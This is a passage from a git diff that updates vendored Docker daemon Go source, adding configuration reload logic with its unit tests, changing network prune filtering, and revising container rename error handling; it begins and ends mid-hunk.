accepted filters have been received + err := pruneFilters.Validate(networksAcceptedFilters) if err != nil { - logrus.Warnf("could not remove cluster networks: %v", err) - } else { + return nil, err + } + + if _, err := getUntilFromPruneFilters(pruneFilters); err != nil { + return nil, err + } + + rep := &types.NetworksPruneReport{} + if clusterRep, err := daemon.clusterNetworksPrune(ctx, pruneFilters); err == nil { rep.NetworksDeleted = append(rep.NetworksDeleted, clusterRep.NetworksDeleted...) } - localRep, err := daemon.localNetworksPrune(pruneFilters) + + localRep := daemon.localNetworksPrune(ctx, pruneFilters) + rep.NetworksDeleted = append(rep.NetworksDeleted, localRep.NetworksDeleted...) + + select { + case <-ctx.Done(): + logrus.Debugf("NetworksPrune operation cancelled: %#v", *rep) + return rep, nil + default: + } + + return rep, nil +} + +func getUntilFromPruneFilters(pruneFilters filters.Args) (time.Time, error) { + until := time.Time{} + if !pruneFilters.Contains("until") { + return until, nil + } + untilFilters := pruneFilters.Get("until") + if len(untilFilters) > 1 { + return until, fmt.Errorf("more than one until filter specified") + } + ts, err := timetypes.GetTimestamp(untilFilters[0], time.Now()) + if err != nil { + return until, err + } + seconds, nanoseconds, err := timetypes.ParseTimestamps(ts, 0) if err != nil { - logrus.Warnf("could not remove local networks: %v", err) - } else { - rep.NetworksDeleted = append(rep.NetworksDeleted, localRep.NetworksDeleted...) + return until, err + } + until = time.Unix(seconds, nanoseconds) + return until, nil +} + +func matchLabels(pruneFilters filters.Args, labels map[string]string) bool { + if !pruneFilters.MatchKVList("label", labels) { + return false + } + // By default MatchKVList will return true if field (like 'label!') does not exist + // So we have to add additional Contains("label!") check + if pruneFilters.Contains("label!") { + if pruneFilters.MatchKVList("label!", labels) { + return false + } } - return rep, err + return true } diff --git a/vendor/github.com/docker/docker/daemon/reload.go b/vendor/github.com/docker/docker/daemon/reload.go new file mode 100644 index 0000000000..210864ff87 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/reload.go @@ -0,0 +1,324 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "encoding/json" + "fmt" + + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/daemon/discovery" + "github.com/sirupsen/logrus" +) + +// Reload reads configuration changes and modifies the +// daemon according to those changes. +// These are the settings that Reload changes: +// - Platform runtime +// - Daemon debug log level +// - Daemon max concurrent downloads +// - Daemon max concurrent uploads +// - Daemon shutdown timeout (in seconds) +// - Cluster discovery (reconfigure and restart) +// - Daemon labels +// - Insecure registries +// - Registry mirrors +// - Daemon live restore +func (daemon *Daemon) Reload(conf *config.Config) (err error) { + daemon.configStore.Lock() + attributes := map[string]string{} + + defer func() { + jsonString, _ := json.Marshal(daemon.configStore) + + // we're unlocking here, because + // LogDaemonEventWithAttributes() -> SystemInfo() -> GetAllRuntimes() + // holds that lock too. + daemon.configStore.Unlock() + if err == nil { + logrus.Infof("Reloaded configuration: %s", jsonString) + daemon.LogDaemonEventWithAttributes("reload", attributes) + } + }() + + if err := daemon.reloadPlatform(conf, attributes); err != nil { + return err + } + daemon.reloadDebug(conf, attributes) + daemon.reloadMaxConcurrentDownloadsAndUploads(conf, attributes) + daemon.reloadShutdownTimeout(conf, attributes) + + if err := daemon.reloadClusterDiscovery(conf, attributes); err != nil { + return err + } + if err := daemon.reloadLabels(conf, attributes); err != nil { + return err + } + if err := daemon.reloadAllowNondistributableArtifacts(conf, attributes); err != nil { + return err + } + if err := daemon.reloadInsecureRegistries(conf, attributes); err != nil { + return err + } + if err := daemon.reloadRegistryMirrors(conf, attributes); err != nil { + return err + } + if err := daemon.reloadLiveRestore(conf, attributes); err != nil { + return err + } + return daemon.reloadNetworkDiagnosticPort(conf, attributes) +} + +// reloadDebug updates configuration with Debug option +// and updates the passed attributes +func (daemon *Daemon) reloadDebug(conf *config.Config, attributes map[string]string) { + // update corresponding configuration + if conf.IsValueSet("debug") { + daemon.configStore.Debug = conf.Debug + } + // prepare reload event attributes with updatable configurations + attributes["debug"] = fmt.Sprintf("%t", daemon.configStore.Debug) +} + +// reloadMaxConcurrentDownloadsAndUploads updates configuration with max concurrent +// download and upload options and updates the passed attributes +func (daemon *Daemon) reloadMaxConcurrentDownloadsAndUploads(conf *config.Config, attributes map[string]string) { + // If no value is set for max-concurrent-downloads we assume it is the default value + // We always "reset" as the cost is lightweight and easy to maintain. + if conf.IsValueSet("max-concurrent-downloads") && conf.MaxConcurrentDownloads != nil { + *daemon.configStore.MaxConcurrentDownloads = *conf.MaxConcurrentDownloads + } else { + maxConcurrentDownloads := config.DefaultMaxConcurrentDownloads + daemon.configStore.MaxConcurrentDownloads = &maxConcurrentDownloads + } + logrus.Debugf("Reset Max Concurrent Downloads: %d", *daemon.configStore.MaxConcurrentDownloads) + + // If no value is set for max-concurrent-upload we assume it is the default value + // We always "reset" as the cost is lightweight and easy to maintain. + if conf.IsValueSet("max-concurrent-uploads") && conf.MaxConcurrentUploads != nil { + *daemon.configStore.MaxConcurrentUploads = *conf.MaxConcurrentUploads + } else { + maxConcurrentUploads := config.DefaultMaxConcurrentUploads + daemon.configStore.MaxConcurrentUploads = &maxConcurrentUploads + } + logrus.Debugf("Reset Max Concurrent Uploads: %d", *daemon.configStore.MaxConcurrentUploads) + + daemon.imageService.UpdateConfig(conf.MaxConcurrentDownloads, conf.MaxConcurrentUploads) + // prepare reload event attributes with updatable configurations + attributes["max-concurrent-downloads"] = fmt.Sprintf("%d", *daemon.configStore.MaxConcurrentDownloads) + // prepare reload event attributes with updatable configurations + attributes["max-concurrent-uploads"] = fmt.Sprintf("%d", *daemon.configStore.MaxConcurrentUploads) +} + +// reloadShutdownTimeout updates configuration with daemon shutdown timeout option +// and updates the passed attributes +func (daemon *Daemon) reloadShutdownTimeout(conf *config.Config, attributes map[string]string) { + // update corresponding configuration + if conf.IsValueSet("shutdown-timeout") { + daemon.configStore.ShutdownTimeout = conf.ShutdownTimeout + logrus.Debugf("Reset Shutdown Timeout: %d", daemon.configStore.ShutdownTimeout) + } + + // prepare reload event attributes with updatable configurations + attributes["shutdown-timeout"] = fmt.Sprintf("%d", daemon.configStore.ShutdownTimeout) +} + +// reloadClusterDiscovery updates configuration with cluster discovery options +// and updates the passed attributes +func (daemon *Daemon) reloadClusterDiscovery(conf *config.Config, attributes map[string]string) (err error) { + defer func() { + // prepare reload event attributes with updatable configurations + attributes["cluster-store"] = conf.ClusterStore + attributes["cluster-advertise"] = conf.ClusterAdvertise + + attributes["cluster-store-opts"] = "{}" + if daemon.configStore.ClusterOpts != nil { + opts, err2 := json.Marshal(conf.ClusterOpts) + if err != nil { + err = err2 + } + attributes["cluster-store-opts"] = string(opts) + } + }() + + newAdvertise := conf.ClusterAdvertise + newClusterStore := daemon.configStore.ClusterStore + if conf.IsValueSet("cluster-advertise") { + if conf.IsValueSet("cluster-store") { + newClusterStore = conf.ClusterStore + } + newAdvertise, err = config.ParseClusterAdvertiseSettings(newClusterStore, conf.ClusterAdvertise) + if err != nil && err != discovery.ErrDiscoveryDisabled { + return err + } + } + + if daemon.clusterProvider != nil { + if err := conf.IsSwarmCompatible(); err != nil { + return err + } + } + + // check discovery modifications + if !config.ModifiedDiscoverySettings(daemon.configStore, newClusterStore, newAdvertise, conf.ClusterOpts) { + return nil + } + + // enable discovery for the first time if it was not previously enabled + if daemon.discoveryWatcher == nil { + discoveryWatcher, err := discovery.Init(newClusterStore, newAdvertise, conf.ClusterOpts) + if err != nil { + return fmt.Errorf("failed to initialize discovery: %v", err) + } + daemon.discoveryWatcher = discoveryWatcher + } else if err == discovery.ErrDiscoveryDisabled { + // disable discovery if it was previously enabled and it's disabled now + daemon.discoveryWatcher.Stop() + } else if err = daemon.discoveryWatcher.Reload(conf.ClusterStore, newAdvertise, conf.ClusterOpts); err != nil { + // reload discovery + return err + } + + daemon.configStore.ClusterStore = newClusterStore + daemon.configStore.ClusterOpts = conf.ClusterOpts + daemon.configStore.ClusterAdvertise = newAdvertise + + if daemon.netController == nil { + return nil + } + netOptions, err := daemon.networkOptions(daemon.configStore, daemon.PluginStore, nil) + if err != nil { + logrus.WithError(err).Warnf("failed to get options with network controller") + return nil + } + err = daemon.netController.ReloadConfiguration(netOptions...) + if err != nil { + logrus.Warnf("Failed to reload configuration with network controller: %v", err) + } + return nil +} + +// reloadLabels updates configuration with engine labels +// and updates the passed attributes +func (daemon *Daemon) reloadLabels(conf *config.Config, attributes map[string]string) error { + // update corresponding configuration + if conf.IsValueSet("labels") { + daemon.configStore.Labels = conf.Labels + } + + // prepare reload event attributes with updatable configurations + if daemon.configStore.Labels != nil { + labels, err := json.Marshal(daemon.configStore.Labels) + if err != nil { + return err + } + attributes["labels"] = string(labels) + } else { + attributes["labels"] = "[]" + } + + return nil +} + +// reloadAllowNondistributableArtifacts updates the configuration with allow-nondistributable-artifacts options +// and updates the passed attributes. +func (daemon *Daemon) reloadAllowNondistributableArtifacts(conf *config.Config, attributes map[string]string) error { + // Update corresponding configuration. + if conf.IsValueSet("allow-nondistributable-artifacts") { + daemon.configStore.AllowNondistributableArtifacts = conf.AllowNondistributableArtifacts + if err := daemon.RegistryService.LoadAllowNondistributableArtifacts(conf.AllowNondistributableArtifacts); err != nil { + return err + } + } + + // Prepare reload event attributes with updatable configurations. + if daemon.configStore.AllowNondistributableArtifacts != nil { + v, err := json.Marshal(daemon.configStore.AllowNondistributableArtifacts) + if err != nil { + return err + } + attributes["allow-nondistributable-artifacts"] = string(v) + } else { + attributes["allow-nondistributable-artifacts"] = "[]" + } + + return nil +} + +// reloadInsecureRegistries updates configuration with insecure registry option +// and updates the passed attributes +func (daemon *Daemon) reloadInsecureRegistries(conf *config.Config, attributes map[string]string) error { + // update corresponding configuration + if conf.IsValueSet("insecure-registries") { + daemon.configStore.InsecureRegistries = conf.InsecureRegistries + if err := daemon.RegistryService.LoadInsecureRegistries(conf.InsecureRegistries); err != nil { + return err + } + } + + // prepare reload event attributes with updatable configurations + if daemon.configStore.InsecureRegistries != nil { + insecureRegistries, err := json.Marshal(daemon.configStore.InsecureRegistries) + if err != nil { + return err + } + attributes["insecure-registries"] = string(insecureRegistries) + } else { + attributes["insecure-registries"] = "[]" + } + + return nil +} + +// reloadRegistryMirrors updates configuration with registry mirror options +// and updates the passed attributes +func (daemon *Daemon) reloadRegistryMirrors(conf *config.Config, attributes map[string]string) error { + // update corresponding configuration + if conf.IsValueSet("registry-mirrors") { + daemon.configStore.Mirrors = conf.Mirrors + if err := daemon.RegistryService.LoadMirrors(conf.Mirrors); err != nil { + return err + } + } + + // prepare reload event attributes with updatable configurations + if daemon.configStore.Mirrors != nil { + mirrors, err := json.Marshal(daemon.configStore.Mirrors) + if err != nil { + return err + } + attributes["registry-mirrors"] = string(mirrors) + } else { + attributes["registry-mirrors"] = "[]" + } + + return nil +} + +// reloadLiveRestore updates configuration with live retore option +// and updates the passed attributes +func (daemon *Daemon) reloadLiveRestore(conf *config.Config, attributes map[string]string) error { + // update corresponding configuration + if conf.IsValueSet("live-restore") { + daemon.configStore.LiveRestoreEnabled = conf.LiveRestoreEnabled + } + + // prepare reload event attributes with updatable configurations + attributes["live-restore"] = fmt.Sprintf("%t", daemon.configStore.LiveRestoreEnabled) + return nil +} + +// reloadNetworkDiagnosticPort updates the network controller starting the diagnostic if the config is valid +func (daemon *Daemon) reloadNetworkDiagnosticPort(conf *config.Config, attributes map[string]string) error { + if conf == nil || daemon.netController == nil || !conf.IsValueSet("network-diagnostic-port") || + conf.NetworkDiagnosticPort < 1 || conf.NetworkDiagnosticPort > 65535 { + // If there is no config make sure that the diagnostic is off + if daemon.netController != nil { + daemon.netController.StopDiagnostic() + } + return nil + } + // Enable the network diagnostic if the flag is set with a valid port withing the range + logrus.WithFields(logrus.Fields{"port": conf.NetworkDiagnosticPort, "ip": "127.0.0.1"}).Warn("Starting network diagnostic server") + daemon.netController.StartDiagnostic(conf.NetworkDiagnosticPort) + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/reload_test.go b/vendor/github.com/docker/docker/daemon/reload_test.go new file mode 100644 index 0000000000..ffad297f71 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/reload_test.go @@ -0,0 +1,573 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "os" + "reflect" + "sort" + "testing" + "time" + + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/daemon/images" + "github.com/docker/docker/pkg/discovery" + _ "github.com/docker/docker/pkg/discovery/memory" + "github.com/docker/docker/registry" + "github.com/docker/libnetwork" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestDaemonReloadLabels(t *testing.T) { + daemon := &Daemon{ + configStore: &config.Config{ + CommonConfig: config.CommonConfig{ + Labels: []string{"foo:bar"}, + }, + }, + imageService: images.NewImageService(images.ImageServiceConfig{}), + } + + valuesSets := make(map[string]interface{}) + valuesSets["labels"] = "foo:baz" + newConfig := &config.Config{ + CommonConfig: config.CommonConfig{ + Labels: []string{"foo:baz"}, + ValuesSet: valuesSets, + }, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + label := daemon.configStore.Labels[0] + if label != "foo:baz" { + t.Fatalf("Expected daemon label `foo:baz`, got %s", label) + } +} + +func TestDaemonReloadAllowNondistributableArtifacts(t *testing.T) { + daemon := &Daemon{ + configStore: &config.Config{}, + imageService: images.NewImageService(images.ImageServiceConfig{}), + } + + var err error + // Initialize daemon with some registries. + daemon.RegistryService, err = registry.NewService(registry.ServiceOptions{ + AllowNondistributableArtifacts: []string{ + "127.0.0.0/8", + "10.10.1.11:5000", + "10.10.1.22:5000", // This will be removed during reload. + "docker1.com", + "docker2.com", // This will be removed during reload. + }, + }) + if err != nil { + t.Fatal(err) + } + + registries := []string{ + "127.0.0.0/8", + "10.10.1.11:5000", + "10.10.1.33:5000", // This will be added during reload. + "docker1.com", + "docker3.com", // This will be added during reload. + } + + newConfig := &config.Config{ + CommonConfig: config.CommonConfig{ + ServiceOptions: registry.ServiceOptions{ + AllowNondistributableArtifacts: registries, + }, + ValuesSet: map[string]interface{}{ + "allow-nondistributable-artifacts": registries, + }, + }, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + var actual []string + serviceConfig := daemon.RegistryService.ServiceConfig() + for _, value := range serviceConfig.AllowNondistributableArtifactsCIDRs { + actual = append(actual, value.String()) + } + actual = append(actual, serviceConfig.AllowNondistributableArtifactsHostnames...) + + sort.Strings(registries) + sort.Strings(actual) + assert.Check(t, is.DeepEqual(registries, actual)) +} + +func TestDaemonReloadMirrors(t *testing.T) { + daemon := &Daemon{ + imageService: images.NewImageService(images.ImageServiceConfig{}), + } + var err error + daemon.RegistryService, err = registry.NewService(registry.ServiceOptions{ + InsecureRegistries: []string{}, + Mirrors: []string{ + "https://mirror.test1.com", + "https://mirror.test2.com", // this will be removed when reloading + "https://mirror.test3.com", // this will be removed when reloading + }, + }) + if err != nil { + t.Fatal(err) + } + + daemon.configStore = &config.Config{} + + type pair struct { + valid bool + mirrors []string + after []string + } + + loadMirrors := []pair{ + { + valid: false, + mirrors: []string{"10.10.1.11:5000"}, // this mirror is invalid + after: []string{}, + }, + { + valid: false, + mirrors: []string{"mirror.test1.com"}, // this mirror is invalid + after: []string{}, + }, + { + valid: false, + mirrors: []string{"10.10.1.11:5000", "mirror.test1.com"}, // mirrors are invalid + after: []string{}, + }, + { + valid: true, + mirrors: []string{"https://mirror.test1.com", "https://mirror.test4.com"}, + after: []string{"https://mirror.test1.com/", "https://mirror.test4.com/"}, + }, + } + + for _, value := range loadMirrors { + valuesSets := make(map[string]interface{}) + valuesSets["registry-mirrors"] = value.mirrors + + newConfig := &config.Config{ + CommonConfig: config.CommonConfig{ + ServiceOptions: registry.ServiceOptions{ + Mirrors: value.mirrors, + }, + ValuesSet: valuesSets, + }, + } + + err := daemon.Reload(newConfig) + if !value.valid && err == nil { + // mirrors should be invalid, should be a non-nil error + t.Fatalf("Expected daemon reload error with invalid mirrors: %s, while get nil", value.mirrors) + } + + if value.valid { + if err != nil { + // mirrors should be valid, should be no error + t.Fatal(err) + } + registryService := daemon.RegistryService.ServiceConfig() + + if len(registryService.Mirrors) != len(value.after) { + t.Fatalf("Expected %d daemon mirrors %s while get %d with %s", + len(value.after), + value.after, + len(registryService.Mirrors), + registryService.Mirrors) + } + + dataMap := map[string]struct{}{} + + for _, mirror := range registryService.Mirrors { + if _, exist := dataMap[mirror]; !exist { + dataMap[mirror] = struct{}{} + } + } + + for _, address := range value.after { + if _, exist := dataMap[address]; !exist { + t.Fatalf("Expected %s in daemon mirrors, while get none", address) + } + } + } + } +} + +func TestDaemonReloadInsecureRegistries(t *testing.T) { + daemon := &Daemon{ + imageService: images.NewImageService(images.ImageServiceConfig{}), + } + var err error + // initialize daemon with existing insecure registries: "127.0.0.0/8", "10.10.1.11:5000", "10.10.1.22:5000" + daemon.RegistryService, err = registry.NewService(registry.ServiceOptions{ + InsecureRegistries: []string{ + "127.0.0.0/8", + "10.10.1.11:5000", + "10.10.1.22:5000", // this will be removed when reloading + "docker1.com", + "docker2.com", // this will be removed when reloading + }, + }) + if err != nil { + t.Fatal(err) + } + + daemon.configStore = &config.Config{} + + insecureRegistries := []string{ + "127.0.0.0/8", // this will be kept + "10.10.1.11:5000", // this will be kept + "10.10.1.33:5000", // this will be newly added + "docker1.com", // this will be kept + "docker3.com", // this will be newly added + } + + valuesSets := make(map[string]interface{}) + valuesSets["insecure-registries"] = insecureRegistries + + newConfig := &config.Config{ + CommonConfig: config.CommonConfig{ + ServiceOptions: registry.ServiceOptions{ + InsecureRegistries: insecureRegistries, + }, + ValuesSet: valuesSets, + }, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + // After Reload, daemon.RegistryService will be changed which is useful + // for registry communication in daemon. + registries := daemon.RegistryService.ServiceConfig() + + // After Reload(), newConfig has come to registries.InsecureRegistryCIDRs and registries.IndexConfigs in daemon. + // Then collect registries.InsecureRegistryCIDRs in dataMap. + // When collecting, we need to convert CIDRS into string as a key, + // while the times of key appears as value. + dataMap := map[string]int{} + for _, value := range registries.InsecureRegistryCIDRs { + if _, ok := dataMap[value.String()]; !ok { + dataMap[value.String()] = 1 + } else { + dataMap[value.String()]++ + } + } + + for _, value := range registries.IndexConfigs { + if _, ok := dataMap[value.Name]; !ok { + dataMap[value.Name] = 1 + } else { + dataMap[value.Name]++ + } + } + + // Finally compare dataMap with the original insecureRegistries. + // Each value in insecureRegistries should appear in daemon's insecure registries, + // and each can only appear exactly ONCE. + for _, r := range insecureRegistries { + if value, ok := dataMap[r]; !ok { + t.Fatalf("Expected daemon insecure registry %s, got none", r) + } else if value != 1 { + t.Fatalf("Expected only 1 daemon insecure registry %s, got %d", r, value) + } + } + + // assert if "10.10.1.22:5000" is removed when reloading + if value, ok := dataMap["10.10.1.22:5000"]; ok { + t.Fatalf("Expected no insecure registry of 10.10.1.22:5000, got %d", value) + } + + // assert if "docker2.com" is removed when reloading + if value, ok := dataMap["docker2.com"]; ok { + t.Fatalf("Expected no insecure registry of docker2.com, got %d", value) + } +} + +func TestDaemonReloadNotAffectOthers(t *testing.T) { + daemon := &Daemon{ + imageService: images.NewImageService(images.ImageServiceConfig{}), + } + daemon.configStore = &config.Config{ + CommonConfig: config.CommonConfig{ + Labels: []string{"foo:bar"}, + Debug: true, + }, + } + + valuesSets := make(map[string]interface{}) + valuesSets["labels"] = "foo:baz" + newConfig := &config.Config{ + CommonConfig: config.CommonConfig{ + Labels: []string{"foo:baz"}, + ValuesSet: valuesSets, + }, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + label := daemon.configStore.Labels[0] + if label != "foo:baz" { + t.Fatalf("Expected daemon label `foo:baz`, got %s", label) + } + debug := daemon.configStore.Debug + if !debug { + t.Fatal("Expected debug 'enabled', got 'disabled'") + } +} + +func TestDaemonDiscoveryReload(t *testing.T) { + daemon := &Daemon{ + imageService: images.NewImageService(images.ImageServiceConfig{}), + } + daemon.configStore = &config.Config{ + CommonConfig: config.CommonConfig{ + ClusterStore: "memory://127.0.0.1", + ClusterAdvertise: "127.0.0.1:3333", + }, + } + + if err := daemon.initDiscovery(daemon.configStore); err != nil { + t.Fatal(err) + } + + expected := discovery.Entries{ + &discovery.Entry{Host: "127.0.0.1", Port: "3333"}, + } + + select { + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for discovery") + case <-daemon.discoveryWatcher.ReadyCh(): + } + + stopCh := make(chan struct{}) + defer close(stopCh) + ch, errCh := daemon.discoveryWatcher.Watch(stopCh) + + select { + case <-time.After(1 * time.Second): + t.Fatal("failed to get discovery advertisements in time") + case e := <-ch: + if !reflect.DeepEqual(e, expected) { + t.Fatalf("expected %v, got %v\n", expected, e) + } + case e := <-errCh: + t.Fatal(e) + } + + valuesSets := make(map[string]interface{}) + valuesSets["cluster-store"] = "memory://127.0.0.1:2222" + valuesSets["cluster-advertise"] = "127.0.0.1:5555" + newConfig := &config.Config{ + CommonConfig: config.CommonConfig{ + ClusterStore: "memory://127.0.0.1:2222", + ClusterAdvertise: "127.0.0.1:5555", + ValuesSet: valuesSets, + }, + } + + expected = discovery.Entries{ + &discovery.Entry{Host: "127.0.0.1", Port: "5555"}, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + select { + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for discovery") + case <-daemon.discoveryWatcher.ReadyCh(): + } + + ch, errCh = daemon.discoveryWatcher.Watch(stopCh) + + select { + case <-time.After(1 * time.Second): + t.Fatal("failed to get discovery advertisements in time") + case e := <-ch: + if !reflect.DeepEqual(e, expected) { + t.Fatalf("expected %v, got %v\n", expected, e) + } + case e := <-errCh: + t.Fatal(e) + } +} + +func TestDaemonDiscoveryReloadFromEmptyDiscovery(t *testing.T) { + daemon := &Daemon{ + imageService: images.NewImageService(images.ImageServiceConfig{}), + } + daemon.configStore = &config.Config{} + + valuesSet := make(map[string]interface{}) + valuesSet["cluster-store"] = "memory://127.0.0.1:2222" + valuesSet["cluster-advertise"] = "127.0.0.1:5555" + newConfig := &config.Config{ + CommonConfig: config.CommonConfig{ + ClusterStore: "memory://127.0.0.1:2222", + ClusterAdvertise: "127.0.0.1:5555", + ValuesSet: valuesSet, + }, + } + + expected := discovery.Entries{ + &discovery.Entry{Host: "127.0.0.1", Port: "5555"}, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + select { + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for discovery") + case <-daemon.discoveryWatcher.ReadyCh(): + } + + stopCh := make(chan struct{}) + defer close(stopCh) + ch, errCh := daemon.discoveryWatcher.Watch(stopCh) + + select { + case <-time.After(1 * time.Second): + t.Fatal("failed to get discovery advertisements in time") + case e := <-ch: + if !reflect.DeepEqual(e, expected) { + t.Fatalf("expected %v, got %v\n", expected, e) + } + case e := <-errCh: + t.Fatal(e) + } +} + +func TestDaemonDiscoveryReloadOnlyClusterAdvertise(t *testing.T) { + daemon := &Daemon{ + imageService: images.NewImageService(images.ImageServiceConfig{}), + } + daemon.configStore = &config.Config{ + CommonConfig: config.CommonConfig{ + ClusterStore: "memory://127.0.0.1", + }, + } + valuesSets := make(map[string]interface{}) + valuesSets["cluster-advertise"] = "127.0.0.1:5555" + newConfig := &config.Config{ + CommonConfig: config.CommonConfig{ + ClusterAdvertise: "127.0.0.1:5555", + ValuesSet: valuesSets, + }, + } + expected := discovery.Entries{ + &discovery.Entry{Host: "127.0.0.1", Port: "5555"}, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + select { + case <-daemon.discoveryWatcher.ReadyCh(): + case <-time.After(10 * time.Second): + t.Fatal("Timeout waiting for discovery") + } + stopCh := make(chan struct{}) + defer close(stopCh) + ch, errCh := daemon.discoveryWatcher.Watch(stopCh) + + select { + case <-time.After(1 * time.Second): + t.Fatal("failed to get discovery advertisements in time") + case e := <-ch: + if !reflect.DeepEqual(e, expected) { + t.Fatalf("expected %v, got %v\n", expected, e) + } + case e := <-errCh: + t.Fatal(e) + } +} + +func TestDaemonReloadNetworkDiagnosticPort(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("root required") + } + daemon := &Daemon{ + imageService: images.NewImageService(images.ImageServiceConfig{}), + } + daemon.configStore = &config.Config{} + + valuesSet := make(map[string]interface{}) + valuesSet["network-diagnostic-port"] = 2000 + enableConfig := &config.Config{ + CommonConfig: config.CommonConfig{ + NetworkDiagnosticPort: 2000, + ValuesSet: valuesSet, + }, + } + disableConfig := &config.Config{ + CommonConfig: config.CommonConfig{}, + } + + netOptions, err := daemon.networkOptions(enableConfig, nil, nil) + if err != nil { + t.Fatal(err) + } + controller, err := libnetwork.New(netOptions...) + if err != nil { + t.Fatal(err) + } + daemon.netController = controller + + // Enable/Disable the server for some iterations + for i := 0; i < 10; i++ { + enableConfig.CommonConfig.NetworkDiagnosticPort++ + if err := daemon.Reload(enableConfig); err != nil { + t.Fatal(err) + } + // Check that the diagnostic is enabled + if !daemon.netController.IsDiagnosticEnabled() { + t.Fatalf("diagnostic should be enable") + } + + // Reload + if err := daemon.Reload(disableConfig); err != nil { + t.Fatal(err) + } + // Check that the diagnostic is disabled + if daemon.netController.IsDiagnosticEnabled() { + t.Fatalf("diagnostic should be disable") + } + } + + enableConfig.CommonConfig.NetworkDiagnosticPort++ + // 2 times the enable should not create problems + if err := daemon.Reload(enableConfig); err != nil { + t.Fatal(err) + } + // Check that the diagnostic is enabled + if !daemon.netController.IsDiagnosticEnabled() { + t.Fatalf("diagnostic should be enable") + } + + // Check that another reload does not cause issues + if err := daemon.Reload(enableConfig); err != nil { + t.Fatal(err) + } + // Check that the diagnostic is enable + if !daemon.netController.IsDiagnosticEnabled() { + t.Fatalf("diagnostic should be enable") + } + +} diff --git a/vendor/github.com/docker/docker/daemon/reload_unix.go b/vendor/github.com/docker/docker/daemon/reload_unix.go new file mode 100644 index 0000000000..9c1bb992af --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/reload_unix.go @@ -0,0 +1,56 @@ +// +build linux freebsd + +package daemon // import "github.com/docker/docker/daemon" + +import ( + "bytes" + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/daemon/config" +) + +// reloadPlatform updates configuration with platform specific options +// and updates the passed attributes +func (daemon *Daemon) reloadPlatform(conf *config.Config, attributes map[string]string) error { + if err := conf.ValidatePlatformConfig(); err != nil { + return err + } + + if conf.IsValueSet("runtimes") { + // Always set the default one + conf.Runtimes[config.StockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary} + if err := daemon.initRuntimes(conf.Runtimes); err != nil { + return err + } + daemon.configStore.Runtimes = conf.Runtimes + } + + if conf.DefaultRuntime != "" { + daemon.configStore.DefaultRuntime = conf.DefaultRuntime + } + + if conf.IsValueSet("default-shm-size") { + daemon.configStore.ShmSize = conf.ShmSize + } + + if conf.IpcMode != "" { + daemon.configStore.IpcMode = conf.IpcMode + } + + // Update attributes + var runtimeList bytes.Buffer + for name, rt := range daemon.configStore.Runtimes { + if runtimeList.Len() > 0 { + runtimeList.WriteRune(' ') + } + runtimeList.WriteString(fmt.Sprintf("%s:%s", name, rt)) + } + + attributes["runtimes"] = runtimeList.String() + attributes["default-runtime"] = daemon.configStore.DefaultRuntime + attributes["default-shm-size"] = fmt.Sprintf("%d", daemon.configStore.ShmSize) + attributes["default-ipc-mode"] = daemon.configStore.IpcMode + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/reload_windows.go b/vendor/github.com/docker/docker/daemon/reload_windows.go new file mode 100644 index 0000000000..548466e8ed --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/reload_windows.go @@ -0,0 +1,9 @@ +package daemon // import "github.com/docker/docker/daemon" + +import "github.com/docker/docker/daemon/config" + +// reloadPlatform updates configuration with platform specific options +// and updates the passed attributes +func (daemon *Daemon) reloadPlatform(config *config.Config, attributes map[string]string) error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/rename.go b/vendor/github.com/docker/docker/daemon/rename.go index ffb7715f23..2b2c48b292 100644 --- a/vendor/github.com/docker/docker/daemon/rename.go +++ b/vendor/github.com/docker/docker/daemon/rename.go @@ -1,12 +1,13 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "fmt" "strings" - "github.com/Sirupsen/logrus" dockercontainer "github.com/docker/docker/container" + "github.com/docker/docker/errdefs" "github.com/docker/libnetwork" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // ContainerRename changes the name of a container, using the oldName @@ -19,7 +20,7 @@ func (daemon *Daemon) ContainerRename(oldName, newName string) error { ) if oldName == "" || newName == "" { - return fmt.Errorf("Neither old nor new names may be empty") + return errdefs.InvalidParameter(errors.New("Neither old nor new names may be empty")) } if newName[0] != '/' { @@ -31,30 +32,30 @@ func (daemon *Daemon) ContainerRename(oldName, newName string) error { return err } + container.Lock() + defer container.Unlock() + oldName = container.Name oldIsAnonymousEndpoint := container.NetworkSettings.IsAnonymousEndpoint if oldName == newName { - return fmt.Errorf("Renaming a container with the same name as its current name") + return errdefs.InvalidParameter(errors.New("Renaming a container with the same name as its current name")) } - container.Lock() - defer container.Unlock() - links := map[string]*dockercontainer.Container{} for k, v := range daemon.linkIndex.children(container) { if !strings.HasPrefix(k, oldName) { - return fmt.Errorf("Linked container %s does not match parent %s", k, oldName) + return errdefs.InvalidParameter(errors.Errorf("Linked container %s does not match parent %s", k, oldName)) } links[strings.TrimPrefix(k, oldName)] = v } if newName, err = daemon.reserveName(container.ID, newName); err != nil { - return fmt.Errorf("Error when allocating new name: %v", err) + return errors.Wrap(err, "Error when allocating new name") } for k, v := range links { - daemon.nameIndex.Reserve(newName+k, v.ID) + daemon.containersReplica.ReserveName(newName+k, v.ID) daemon.linkIndex.link(container, 